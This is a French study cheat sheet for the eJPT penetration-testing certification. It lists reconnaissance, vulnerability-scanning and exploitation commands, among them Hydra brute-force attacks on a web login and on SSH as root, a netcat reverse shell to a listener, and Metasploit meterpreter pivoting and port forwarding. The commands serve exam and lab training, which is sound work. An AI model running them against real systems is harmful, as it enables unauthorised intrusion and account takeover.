eJPT Certification - guide pratique

L'eJPT (eLearnSecurity Junior Penetration Tester) est une certification d'entrée en pentesting proposée par eLearnSecurity. Elle valide les compétences fondamentales en tests d'intrusion, notamment la reconnaissance, l'exploitation de vulnérabilités et la post-exploitation. L'examen est pratique et consiste à compromettre un environnement simulé, ce qui le rend idéal pour les débutants souhaitant prouver leurs compétences en cybersécurité offensive.

eJPT Certification | INE SecurityINE

Reconnaissance

Scan réseau

Scan des équipements sur un réseau :

nmap -sn 10.10.10.10/24
arp-scan -l
masscan 10.10.10.10/24 -p1-65535 --rate=10000

Scan des ports ouverts sur un équipement spécifique :

nmap --open -sS --min-rate 2000 -p- -n -Pn -vvv 10.10.10.10
rustscan -a 10.10.10.10 --ulimit 5000

Scan des ports ouverts sur plusieurs équipements :

nmap --open -sS --min-rate 2000 -p- -n -Pn -vvv 10.10.10.10,20,30,36 -oG allPorts

Extraction des ports ouverts :

grep '[0-9]' allPorts | cut -d '/' -f1 | sort -u | xargs | tr ' '  ','

Exemple de sortie : 22,80,135,445,9543,2214

Scan détaillé des versions des services détectés :

nmap --open -sCV -p 22,80,135,445,9543,2214 10.10.10.10,20,30,36 -oN targeted

Ping Sweep sur un réseau Linux

for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done

Analyse des vulnérabilités

Scan de vulnérabilités Web avec Nikto :

nikto -url http://website.com

Détection des vulnérabilités SQL avec SQLmap :

sqlmap -r request --dbs

Recherche de vulnérabilités SMB :

nmap -p445 --script"smb-vuln-*" 10.10.10.10
enum4linux -a 10.10.10.10
crackmapexec smb 10.10.10.10 --shares

Exploitation

Attaque par force brute avec Hydra

Login panel:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/admin/admin.php:username=^USER^&password=^PASS^:Incorrect" -t 64 -F

Brute-force SSH avec Hydra :

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10

Metasploit - Pivoting et Post-exploitation

Metasploit Revershell

Utilisation de Metasploit pour obtenir un accès

msfconsole

Configuration d'un listener :

use multi/handler
set LHOST 10.10.10.10
set LPORT 443
run

Envoi d'une reverse shell avec Netcat :

nc 10.10.10.10 443 -e /bin/bash

Mise en arrière-plan de la session :

sessions

Metasploit to meterpreter

Méthode 1 - Conversion d'une shell en Meterpreter

Chargement du module de conversion :

use shell_to_meterpreter

Configuration de la session et du port :

set LHOST 10.10.10.10
set lport 443
set session 1

Interaction avec la session Meterpreter :

sessions -i 2

Ajout d'une route pour accéder à un autre segment réseau :

route add 192.168.100.0/24 2

Méthode 2 - Utilisation d'Autoroute

Chargement du module autoroute :

use multi/manage/autoroute

Configuration de la session et exécution :

set session 2
run

Scan réseau depuis Metasploit

Scan des ports d'une machine pivotée :

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.100.21
run

Metasploit redirection de port

Ajout d'un port forward pour accéder à un service distant :

sessions -i 2
portfwd add -l 8080 -p 80 -r 192.168.100.21

Liste des règles de redirection :

portfwd

Mis à jour il y a 1 mois

hashtagReconnaissance

hashtagScan réseau

hashtagAnalyse des vulnérabilités

hashtagExploitation

hashtagAttaque par force brute avec Hydra

hashtagMetasploit - Pivoting et Post-exploitation

hashtagMetasploit Revershell

hashtagMetasploit to meterpreter

hashtag Metasploit redirection de port

Reconnaissance

Scan réseau

Analyse des vulnérabilités

Exploitation

Attaque par force brute avec Hydra

Metasploit - Pivoting et Post-exploitation

Metasploit Revershell

Metasploit to meterpreter

Metasploit redirection de port